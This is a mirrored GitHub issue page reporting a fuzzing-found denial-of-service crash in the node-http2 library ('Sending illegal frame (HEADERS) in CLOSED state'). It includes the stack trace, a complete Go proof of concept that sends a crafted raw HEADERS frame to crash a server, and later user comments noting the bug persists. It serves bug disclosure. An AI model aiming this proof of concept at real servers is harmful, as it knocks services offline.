Stuck on an issue?

Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.

And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.

illegal frame HEADERS crash from Stream._pushUpstream

See original GitHub issue

illegal frame HEADERS from Stream._pushUpstream

DoS found via fuzzing

Crash

/Users/stuartlarsen/Pentests/node-http2/node_modules/http2/lib/protocol/stream.js:627
      throw new Error('Sending illegal frame (' + frame.type + ') in ' + this.
            ^
Error: Sending illegal frame (HEADERS) in CLOSED state.
    at Stream.transition [as _transition] (/Users/stuartlarsen/Pentests/node-http2/node_modules/http2/lib/protocol/stream.js:627:13)
    at Stream._pushUpstream (/Users/stuartlarsen/Pentests/node-http2/node_modules/http2/lib/protocol/stream.js:230:8)
    at Stream.headers (/Users/stuartlarsen/Pentests/node-http2/node_modules/http2/lib/protocol/stream.js:101:8)
    at OutgoingResponse.writeHead (/Users/stuartlarsen/Pentests/node-http2/node_modules/http2/lib/http.js:677:15)
    at OutgoingResponse._implicitHeaders (/Users/stuartlarsen/Pentests/node-http2/node_modules/http2/lib/http.js:683:10)
    at OutgoingResponse.end (/Users/stuartlarsen/Pentests/node-http2/node_modules/http2/lib/http.js:693:8)
    at Server.<anonymous> (/Users/stuartlarsen/Pentests/node-http2/server.js:10:12)
    at Server.emit (events.js:110:17)
    at IncomingRequest.g (events.js:199:16)
    at IncomingRequest.emit (events.js:104:17)

PoC

package main

import (
    "crypto/tls"
    "encoding/base64"
    "io"
    "log"
    "net"

    "github.com/bradfitz/http2"
)

func main() {
    var Target = "localhost:1338"

    conn, err := Dial(Target, true)
    if err != nil {
        panic(err)
    }
    io.WriteString(conn, http2.ClientPreface)

    framer := http2.NewFramer(conn, conn)
    framer.WriteSettings()
    framer.WriteSettingsAck()

    //{"Flags":30,"FrameMethod":"RawFrame","FrameType":1,"Payload":"3kByAK/43RyeVSakJhdGNY38FBFuFm6fBvCVcc+b3EM0cCHtBkfJP5+v+sa7BTuyx5fJL13FsMpnZwTiQ171Qd3qchmdrPZBBS/gWigV4aBI","StreamID":1311466052}
    framer.WriteRawFrame(http2.FrameType(1), http2.Flags(30), 3, FromBase64("3kByAK/43RyeVSakJhdGNY38FBFuFm6fBvCVcc+b3EM0cCHtBkfJP5+v+sa7BTuyx5fJL13FsMpnZwTiQ171Qd3qchmdrPZBBS/gWigV4aBI"))
}

func FromBase64(in string) []byte {
    data, err := base64.StdEncoding.DecodeString(in)
    if err != nil {
        panic(err)
    }
    return data
}

func Dial(host string, isTLS bool) (net.Conn, error) {
    log.Printf("Connecting to %s ...", host)

    if isTLS {
        cfg := &tls.Config{
            ServerName:         host,
            NextProtos:         []string{"h2", "h2-14"},
            InsecureSkipVerify: true,
        }

        tc, err := tls.Dial("tcp", host, cfg)
        if err != nil {
            return nil, err
        }

        log.Printf("Connected to %v", tc.RemoteAddr())

        if err := tc.Handshake(); err != nil {
            return nil, err
        }

        state := tc.ConnectionState()
        log.Printf("Negotiated protocol %q", state.NegotiatedProtocol)
        if !state.NegotiatedProtocolIsMutual || state.NegotiatedProtocol == "" {
            return nil, err
        }

        return tc, nil
    } else {

        log.Printf("Connecting to %s ...", host)
        TCPConn, err := net.Dial("tcp", host)
        if err != nil {
            return nil, err
        }

        return TCPConn, nil
    }

}

Issue Analytics

State:
Created 8 years ago
Comments:14

Top GitHub Comments

3reactions

dbocommented, Apr 7, 2016

@nwgh Does this issue need to be reopened? It’s reliably reproducible for me.

2reactions

maoberlehnercommented, Sep 4, 2017

Why is this closed? This still happens using node v8.4.0 and http2 v3.3.6

@nwgh is this project dead? Maybe you could add anybody (e.g. @kaazing) willing to continue working on this project as a maintainer?

I think it would be pretty lame to block the http2 namespace on npm, having 30,000 Downloads a week and just abandoning the project.

Top Results From Across the Web

The HTTP crash course nobody asked for - fasterthanli.me

The request and response header are separated by CRLF ( \r\n ), and contain various bits of metadata about a request. Requests are...

Server Crashing with "Cannot set headers after they are sent ...

What did you expect to happen? The server to not crash. Ideally the error would be returned as a 503. _http_outgoing.js:485 throw new...

Bug listing with status RESOLVED with resolution UPSTREAM ...

Bug:6292 - "loadkeys broken, or kernel memory garbled!!!" status:RESOLVED resolution:UPSTREAM severity:major · Bug:7994 - "Patch to net-tools to allow ...

Changes - Nginx.org

When at least one js_import directive was declared in both HTTP and Stream, ngx.fetch() returned inapproriate response in Stream. The bug was introduced...

Fix Git's "fatal: no upstream branch" error quickly example

The simple solution to the current problem is easily solved by issuing the following Git push upstream command: